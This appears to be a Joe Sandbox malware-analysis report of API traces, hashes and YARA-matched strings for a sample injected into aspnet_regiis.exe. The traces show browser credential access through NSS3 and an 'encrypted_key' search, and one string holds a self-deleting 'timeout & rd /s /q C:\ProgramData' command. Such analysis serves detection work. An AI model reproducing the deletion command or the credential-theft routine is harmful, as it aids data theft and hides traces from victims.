                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                              • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                              • API String ID: 2823247455-1079830800
                                                                                                                                                                              • Opcode ID: 070a97e2432df5a97b6d8fd52be539a78c375ed59fce2ac2bf3642ad027d8e09
                                                                                                                                                                              • Instruction ID: 93e03c11fcbab199f045e48762afafb80ca043cb5ad38541ca4a9308768b3fe5
                                                                                                                                                                              • Opcode Fuzzy Hash: 070a97e2432df5a97b6d8fd52be539a78c375ed59fce2ac2bf3642ad027d8e09
                                                                                                                                                                              • Instruction Fuzzy Hash: 6551C6B1D802399BDB21EF25CE80A9DB3BDAB44714F4100E5AB18B3151DB30AFCA8F54
                                                                                                                                                                              APIs
                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CBC781D,00000000,6CBBBE2C,?,6CBC6B1D,?,?,?,?,00000000,00000000,6CBC781D), ref: 6CBC6C40
                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CBC781D,?,6CBBBE2C,?), ref: 6CBC6C58
                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CBC781D), ref: 6CBC6C6F
                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CBC6C84
                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CBC6C96
                                                                                                                                                                                • Part of subcall function 6CB71240: TlsGetValue.KERNEL32(00000040,?,6CB7116C,NSPR_LOG_MODULES), ref: 6CB71267
                                                                                                                                                                                • Part of subcall function 6CB71240: EnterCriticalSection.KERNEL32(?,?,?,6CB7116C,NSPR_LOG_MODULES), ref: 6CB7127C
                                                                                                                                                                                • Part of subcall function 6CB71240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CB7116C,NSPR_LOG_MODULES), ref: 6CB71291
                                                                                                                                                                                • Part of subcall function 6CB71240: PR_Unlock.NSS3(?,?,?,?,6CB7116C,NSPR_LOG_MODULES), ref: 6CB712A0
                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CBC6CAA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                              • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                              • API String ID: 4221828374-3736768024
                                                                                                                                                                              • Opcode ID: 269a7fabcaa96558d57c1b06b7d1162fd0376a821132ff9bc84475580e16c067
                                                                                                                                                                              • Instruction ID: e4f98ea99ac17a38846db8874c451298730f4ee2e994284ac96dc820c0055dcf
                                                                                                                                                                              • Opcode Fuzzy Hash: 269a7fabcaa96558d57c1b06b7d1162fd0376a821132ff9bc84475580e16c067
                                                                                                                                                                              • Instruction Fuzzy Hash: 1D01A2F170238227EA1027B95D4AF37369DDF91258F140431FE08E0A81FAA2E52482B7
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_SetErrorText.NSS3(00000000,00000000,?,6CB978F8), ref: 6CBD4E6D
                                                                                                                                                                                • Part of subcall function 6CB709E0: TlsGetValue.KERNEL32(00000000,?,?,?,6CB706A2,00000000,?), ref: 6CB709F8
                                                                                                                                                                                • Part of subcall function 6CB709E0: malloc.MOZGLUE(0000001F), ref: 6CB70A18
                                                                                                                                                                                • Part of subcall function 6CB709E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6CB70A33
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6CB978F8), ref: 6CBD4ED9
                                                                                                                                                                                • Part of subcall function 6CBC5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6CBC7703,?,00000000,00000000), ref: 6CBC5942
                                                                                                                                                                                • Part of subcall function 6CBC5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CBC7703), ref: 6CBC5954
                                                                                                                                                                                • Part of subcall function 6CBC5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CBC596A
                                                                                                                                                                                • Part of subcall function 6CBC5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CBC5984
                                                                                                                                                                                • Part of subcall function 6CBC5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6CBC5999
                                                                                                                                                                                • Part of subcall function 6CBC5920: free.MOZGLUE(00000000), ref: 6CBC59BA
                                                                                                                                                                                • Part of subcall function 6CBC5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6CBC59D3
                                                                                                                                                                                • Part of subcall function 6CBC5920: free.MOZGLUE(00000000), ref: 6CBC59F5
                                                                                                                                                                                • Part of subcall function 6CBC5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6CBC5A0A
                                                                                                                                                                                • Part of subcall function 6CBC5920: free.MOZGLUE(00000000), ref: 6CBC5A2E
                                                                                                                                                                                • Part of subcall function 6CBC5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6CBC5A43
                                                                                                                                                                              • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD4EB3
                                                                                                                                                                                • Part of subcall function 6CBD4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CBD4EB8,?,?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD484C
                                                                                                                                                                                • Part of subcall function 6CBD4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CBD4EB8,?,?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD486D
                                                                                                                                                                                • Part of subcall function 6CBD4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6CBD4EB8,?), ref: 6CBD4884
                                                                                                                                                                              • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD4EC0
                                                                                                                                                                                • Part of subcall function 6CBD4470: TlsGetValue.KERNEL32(00000000,?,6CB97296,00000000), ref: 6CBD4487
                                                                                                                                                                                • Part of subcall function 6CBD4470: EnterCriticalSection.KERNEL32(?,?,?,6CB97296,00000000), ref: 6CBD44A0
                                                                                                                                                                                • Part of subcall function 6CBD4470: PR_Unlock.NSS3(?,?,?,?,6CB97296,00000000), ref: 6CBD44BB
                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD4F16
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD4F2E
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD4F40
                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD4F6C
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD4F80
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD4F8F
                                                                                                                                                                              • PK11_UpdateSlotAttribute.NSS3(?,6CCADCB0,00000000), ref: 6CBD4FFE
                                                                                                                                                                              • PK11_UserDisableSlot.NSS3(0000001E), ref: 6CBD501F
                                                                                                                                                                              • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD506B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 560490210-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 786543732-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • sqlite3_value_text16.NSS3(?), ref: 6CC54CAF
                                                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CC54CFD
                                                                                                                                                                              • sqlite3_value_text16.NSS3(?), ref: 6CC54D44
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                              • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                              • API String ID: 2274617401-4033235608
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_LogPrint.NSS3(C_DigestUpdate), ref: 6CBB6F16
                                                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CBB6F44
                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CBB6F53
                                                                                                                                                                                • Part of subcall function 6CC9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC9D963
                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6CBB6F69
                                                                                                                                                                              • PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CBB6F88
                                                                                                                                                                              • PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6CBB6FA1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                              • String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
                                                                                                                                                                              • API String ID: 1003633598-226530419
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A15845
                                                                                                                                                                              • _memset.LIBCMT ref: 02A15856
                                                                                                                                                                                • Part of subcall function 02A11DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A11DFD
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A15881
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A1589F
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A158B3
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A158C6
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A11D92: GetFileAttributesA.KERNEL32(?,?,?,02A0DA7F,?,?,?), ref: 02A11D99
                                                                                                                                                                                • Part of subcall function 02A0819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,02A0CC90,?,?), ref: 02A081E5
                                                                                                                                                                                • Part of subcall function 02A07FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                                • Part of subcall function 02A07FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                                • Part of subcall function 02A07FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                                • Part of subcall function 02A07FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                                • Part of subcall function 02A07FAC: CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                                • Part of subcall function 02A121E7: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,02A1595C,?), ref: 02A121F2
                                                                                                                                                                              • StrStrA.SHLWAPI(00000000), ref: 02A1596A
                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 02A15A8C
                                                                                                                                                                                • Part of subcall function 02A08048: CryptStringToBinaryA.CRYPT32(02A06724,00000000,00000001,00000000,?,00000000,00000000), ref: 02A08060
                                                                                                                                                                                • Part of subcall function 02A08048: LocalAlloc.KERNEL32(00000040,?,?,?,02A06724,?), ref: 02A0806E
                                                                                                                                                                                • Part of subcall function 02A08048: CryptStringToBinaryA.CRYPT32(02A06724,00000000,00000001,00000000,?,00000000,00000000), ref: 02A08084
                                                                                                                                                                                • Part of subcall function 02A08048: LocalFree.KERNEL32(?,?,?,02A06724,?), ref: 02A08093
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A15A18
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A36645), ref: 02A15A35
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A15A54
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A36A8C), ref: 02A15A65
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4109952398-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04C97
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04CB0
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04CC9
                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04D11
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04D2A
                                                                                                                                                                              • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04D4A
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04D57
                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04D97
                                                                                                                                                                              • PR_Lock.NSS3(?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04DBA
                                                                                                                                                                              • PR_WaitCondVar.NSS3 ref: 6CB04DD4
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04DE6
                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04DEF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3388019835-0
                                                                                                                                                                              • Opcode ID: 110f73de5c1782ec1f6e161feaee4a67a536dbddf7820e2fd31a377a67753cd0
                                                                                                                                                                              • Instruction ID: a14fc52fdb4f1570716f8bb0716d2c98c5b4af2dbdc441214df9ba4e89079cea
                                                                                                                                                                              • Opcode Fuzzy Hash: 110f73de5c1782ec1f6e161feaee4a67a536dbddf7820e2fd31a377a67753cd0
                                                                                                                                                                              • Instruction Fuzzy Hash: 1A417BB1A14A95CFCB10AF7CD484159BBB8FF1A314F058669D888DB711EB30E894CF92
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3833677464-0
                                                                                                                                                                              • Opcode ID: 22bf12a178615cb1d87898be99bfd6efa9ffc9b6b2ba0e7347fbc566c69f9df1
                                                                                                                                                                              • Instruction ID: 5ca5ad045d03e98263f05c5801ea28c24ce2ee38439fa75f9327860c01a1ce28
                                                                                                                                                                              • Opcode Fuzzy Hash: 22bf12a178615cb1d87898be99bfd6efa9ffc9b6b2ba0e7347fbc566c69f9df1
                                                                                                                                                                              • Instruction Fuzzy Hash: A3212771185A21FFDB317F2DD941D1EB7E6DF42B60B10802DF58446664DF358848CE64
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A015BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 02A015C6
                                                                                                                                                                                • Part of subcall function 02A015BC: RtlAllocateHeap.NTDLL(00000000), ref: 02A015CD
                                                                                                                                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 02A01606
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02A0160C
                                                                                                                                                                              • RtlSetCriticalSectionSpinCount.NTDLL(00000000,00000000), ref: 02A01614
                                                                                                                                                                              • GetWindowContextHelpId.USER32(00000000), ref: 02A0161B
                                                                                                                                                                              • GetWindowLongW.USER32(00000000,00000000), ref: 02A01623
                                                                                                                                                                              • RegisterClassW.USER32(00000000), ref: 02A0162A
                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 02A01631
                                                                                                                                                                              • ConvertDefaultLocale.KERNEL32(00000000), ref: 02A01638
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 02A01644
                                                                                                                                                                              • IsDialogMessageW.USER32(00000000,00000000), ref: 02A0164C
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A01656
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0165D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Window$MessageProcess$AllocateByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3736313755-0
                                                                                                                                                                              • Opcode ID: d5335a05308f5e5b2cedd71d9bbd4cb361a2ab2ffa5f7b1f7c6f979d10f3655c
                                                                                                                                                                              • Instruction ID: ea03cfe2669c67e23f8e26023395ac476dfb075d53915be8cb9b5daeef8ca0f9
                                                                                                                                                                              • Opcode Fuzzy Hash: d5335a05308f5e5b2cedd71d9bbd4cb361a2ab2ffa5f7b1f7c6f979d10f3655c
                                                                                                                                                                              • Instruction Fuzzy Hash: 13014672882824BBC7156BE1AD4CDDF7E6CFE0B352B040845F60A910408F798622CBFA
                                                                                                                                                                              APIs
                                                                                                                                                                              • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CBCDE64), ref: 6CBCED0C
                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBCED22
                                                                                                                                                                                • Part of subcall function 6CBDB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CCB18D0,?), ref: 6CBDB095
                                                                                                                                                                              • PL_FreeArenaPool.NSS3(?), ref: 6CBCED4A
                                                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6CBCED6B
                                                                                                                                                                              • PR_CallOnce.NSS3(6CCE2AA4,6CBE12D0), ref: 6CBCED38
                                                                                                                                                                                • Part of subcall function 6CB04C70: TlsGetValue.KERNEL32(?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04C97
                                                                                                                                                                                • Part of subcall function 6CB04C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04CB0
                                                                                                                                                                                • Part of subcall function 6CB04C70: PR_Unlock.NSS3(?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04CC9
                                                                                                                                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6CBCED52
                                                                                                                                                                              • PR_CallOnce.NSS3(6CCE2AA4,6CBE12D0), ref: 6CBCED83
                                                                                                                                                                              • PL_FreeArenaPool.NSS3(?), ref: 6CBCED95
                                                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6CBCED9D
                                                                                                                                                                                • Part of subcall function 6CBE64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CBE127C,00000000,00000000,00000000), ref: 6CBE650E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                              • String ID: security
                                                                                                                                                                              • API String ID: 3323615905-3315324353
                                                                                                                                                                              • Opcode ID: 73bbc61578522cb584bc47ec566ef742d852df05538fa8e008ab3537a8f29814
                                                                                                                                                                              • Instruction ID: 85ba84b4467c0b6ebe8deed775ee4a79e47926d0e7f52ee9afd1d8590ad50d5c
                                                                                                                                                                              • Opcode Fuzzy Hash: 73bbc61578522cb584bc47ec566ef742d852df05538fa8e008ab3537a8f29814
                                                                                                                                                                              • Instruction Fuzzy Hash: 73118C76B002E8A7E6205725AC42BBF7378AF06B4CF050828E81173E41FB20A50CD6E7
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_LogPrint.NSS3(C_InitToken), ref: 6CBB2CEC
                                                                                                                                                                              • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CBB2D07
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_Now.NSS3 ref: 6CC90A22
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CC90A35
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CC90A66
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_GetCurrentThread.NSS3 ref: 6CC90A70
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CC90A9D
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CC90AC8
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_vsmprintf.NSS3(?,?), ref: 6CC90AE8
                                                                                                                                                                                • Part of subcall function 6CC909D0: EnterCriticalSection.KERNEL32(?), ref: 6CC90B19
                                                                                                                                                                                • Part of subcall function 6CC909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC90B48
                                                                                                                                                                                • Part of subcall function 6CC909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC90C76
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_LogFlush.NSS3 ref: 6CC90C7E
                                                                                                                                                                              • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CBB2D22
                                                                                                                                                                                • Part of subcall function 6CC909D0: OutputDebugStringA.KERNEL32(?), ref: 6CC90B88
                                                                                                                                                                                • Part of subcall function 6CC909D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC90C5D
                                                                                                                                                                                • Part of subcall function 6CC909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CC90C8D
                                                                                                                                                                                • Part of subcall function 6CC909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC90C9C
                                                                                                                                                                                • Part of subcall function 6CC909D0: OutputDebugStringA.KERNEL32(?), ref: 6CC90CD1
                                                                                                                                                                                • Part of subcall function 6CC909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CC90CEC
                                                                                                                                                                                • Part of subcall function 6CC909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC90CFB
                                                                                                                                                                                • Part of subcall function 6CC909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC90D16
                                                                                                                                                                                • Part of subcall function 6CC909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CC90D26
                                                                                                                                                                                • Part of subcall function 6CC909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC90D35
                                                                                                                                                                                • Part of subcall function 6CC909D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CC90D65
                                                                                                                                                                                • Part of subcall function 6CC909D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CC90D70
                                                                                                                                                                                • Part of subcall function 6CC909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC90D90
                                                                                                                                                                                • Part of subcall function 6CC909D0: free.MOZGLUE(00000000), ref: 6CC90D99
                                                                                                                                                                              • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CBB2D3B
                                                                                                                                                                                • Part of subcall function 6CC909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CC90BAB
                                                                                                                                                                                • Part of subcall function 6CC909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC90BBA
